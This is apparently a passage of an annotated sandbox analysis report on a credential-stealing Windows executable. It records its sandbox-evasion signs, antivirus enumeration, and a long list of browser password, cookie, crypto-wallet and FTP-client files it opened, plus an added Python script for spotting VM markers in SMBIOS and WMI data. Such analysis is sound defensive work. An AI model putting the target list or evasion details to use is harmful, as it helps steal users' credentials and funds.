Note: the negative values are NT relative delays and the unit is milliseconds despite the "s" suffix (the comparison threshold of 30000 is the report's 30-second rule). The sample's own thread waits 240 000 ms, i.e. 4 minutes, which is the "long sleeps (>= 3 min)" signature and enough to outlast a short sandbox run. 922337203685477 is Int64.MaxValue / 10 000, a .NET TimeSpan.MaxValue expressed in milliseconds, so an effectively infinite wait; PowerShell's runtime produces such waits on its own, so attribute those entries to the script only after reading it. The 2102 and 309 short sleeps on the PowerShell threads look like a polling loop.
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2473405041.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2450762284.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.00000000006EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006A2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Note: "Hyper-V RAW" is the name of the Winsock AF_HYPERV protocol provider and shows up in the memory of any process that enumerates Winsock providers on an ordinary Windows 10/11 installation, so on its own it is weak evidence of VM detection; the WMI and firmware queries above are the real checks.
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Note: System.Data.dll and System.Transactions.dll being resolved by powershell.exe means the script touches ADO.NET types; that is consistent with reading browser SQLite stores but is not proof by itself. The .cat lookup under CatRoot is a catalog-signature check and pairs with the SIP providers listed earlier.
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2473405041.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2450762284.00000000006FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Note: MachineGuid is the usual source for a stable victim identifier in the C2 check-in. The SecurityCenter2 AntiVirusProduct query enumerates the registered security products, and the MsMpEng.exe path string shows that Windows Defender is one the sample knows by process path.
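The three fingerprinting calls in this section (Win32_VideoController, Win32_BIOS and the SMBIOS table read behind FirmwareTableInformation) are worth replaying offline, because they show exactly which strings a sandbox has to scrub to survive them. The Python below is an added example, not code from the sample or from Joe Sandbox: it parses a RawSMBIOSData buffer of the shape GetSystemFirmwareTable('RSMB') returns (8-byte header, then DMTF structures: a 4-byte header, a formatted area, and a NUL-terminated string set closed by a double NUL), pulls out every string, and scans them and a set of WMI answers for hypervisor vendor markers. The marker list, the sample SMBIOS buffer (reduced to the string-index bytes in its formatted areas) and the WMI values are constructed for this example.

```python
import struct

# Vendor strings that give a hypervisor away in SMBIOS or WMI data. Constructed
# for this example from commonly seen values; extend it for your own sandbox.
VM_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "bochs", "seabios",
              "xen", "kvm", "parallels", "hyper-v", "virtual machine")


def smbios_strings(raw_smbios):
    """Return [(structure_type, [strings]), ...] from a RawSMBIOSData buffer:
    8-byte header (calling method, major, minor, DMI revision, u32 length)
    followed by the DMTF structure table."""
    if len(raw_smbios) < 8:
        return []
    length = struct.unpack_from("<BBBBI", raw_smbios, 0)[4]
    table = raw_smbios[8:8 + length]
    out, off = [], 0
    while off + 4 <= len(table):
        stype, slen, _handle = struct.unpack_from("<BBH", table, off)
        if slen < 4:             # malformed header: stop rather than loop forever
            break
        pos, strings = off + slen, []
        while True:              # string set: NUL-terminated strings, then one more NUL
            end = table.find(b"\x00", pos)
            if end < 0:
                return out       # truncated buffer
            if end == pos:       # a lone NUL closes the string set
                pos = end + 1
                break
            strings.append(table[pos:end].decode("ascii", "replace"))
            pos = end + 1
        if not strings:          # an empty string set is encoded as two NULs
            pos += 1
        out.append((stype, strings))
        if stype == 127:         # End-of-Table structure
            break
        off = pos
    return out


def vm_markers(values):
    """Sorted VM_MARKERS found in any of the given strings, case-insensitively."""
    found = set()
    for value in values:
        low = value.lower()
        found.update(m for m in VM_MARKERS if m in low)
    return sorted(found)


def firmware_vm_markers(raw_smbios):
    """What the FirmwareTableInformation check would learn from this guest."""
    return vm_markers(s for _, strs in smbios_strings(raw_smbios) for s in strs)


def wmi_vm_markers(wmi_rows):
    """wmi_rows maps 'Class.Property' to the value a query such as
    SELECT * FROM Win32_VideoController or Win32_BIOS would return."""
    return vm_markers(str(v) for v in wmi_rows.values())


# --- constructed sample data --------------------------------------------------
def _smbios_struct(stype, handle, formatted, strings):
    body = struct.pack("<BBH", stype, 4 + len(formatted), handle) + formatted
    body += b"".join(s.encode() + b"\x00" for s in strings)
    return body + (b"\x00" if strings else b"\x00\x00")


def build_sample_rsmb():
    """A minimal RawSMBIOSData buffer as a VirtualBox guest exposes it
    (constructed; formatted areas hold only the string-index bytes)."""
    bios = _smbios_struct(0, 0x0000, bytes([1, 2, 3]),
                          ["innotek GmbH", "VirtualBox", "12/01/2006"])
    system = _smbios_struct(1, 0x0001, bytes([1, 2, 3, 4]),
                            ["innotek GmbH", "VirtualBox", "1.2", "0"])
    end = _smbios_struct(127, 0x0002, b"", [])
    table = bios + system + end
    return struct.pack("<BBBBI", 0, 2, 7, 0, len(table)) + table


SAMPLE_WMI = {   # constructed answers to the sample's two WMI queries
    "Win32_VideoController.Name": "VirtualBox Graphics Adapter",
    "Win32_BIOS.Manufacturer": "innotek GmbH",
    "Win32_BIOS.SMBIOSBIOSVersion": "VirtualBox",
}

if __name__ == "__main__":
    print("SMBIOS markers:", firmware_vm_markers(build_sample_rsmb()))
    print("WMI markers:   ", wmi_vm_markers(SAMPLE_WMI))
```

On a real analysis host, feed firmware_vm_markers the bytes returned by GetSystemFirmwareTable('RSMB', 0) and wmi_vm_markers the output of the two WMI queries; anything the functions report is a string the guest leaks to the sample, and the firmware copy has to be fixed at the hypervisor (DMI/SMBIOS settings), not in the registry.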

              Stealing of Sensitive Information

Source: Yara match, file source: Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412, type: MEMORYSTR
Source: Yara match, file source: sslproxydump.pcap, type: PCAP
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe String found in binary or memory: Wallets/Electrum-LTC
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe String found in binary or memory: Wallets/ElectronCash
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe String found in binary or memory: window-state.json
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2472007209.00000000006E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe String found in binary or memory: %appdata%\Ethereum
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2277349112.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe File opened:
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
  C:\Users\user\AppData\Roaming\FTPGetter
  C:\Users\user\AppData\Roaming\FTPInfo
  C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
  C:\Users\user\AppData\Roaming\FTPbox
  C:\Users\user\AppData\Roaming\FTPRush
  C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
  C:\ProgramData\SiteDesigner\3D-FTP
  C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
  C:\Users\user\AppData\Roaming\Ledger Live
  C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
  C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
  C:\Users\user\AppData\Roaming\Bitcoin\wallets
  C:\Users\user\AppData\Roaming\Binance
  C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
  C:\Users\user\AppData\Roaming\Electrum\wallets
  C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
  C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe Directory queried:
  C:\Users\user\Documents
  C:\Users\user\Documents\DVWHKMNFNN
  C:\Users\user\Documents\KATAXZVCPS
  C:\Users\user\Documents\KZWFNRXYKI
  C:\Users\user\Documents\NEBFQQYWPS
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
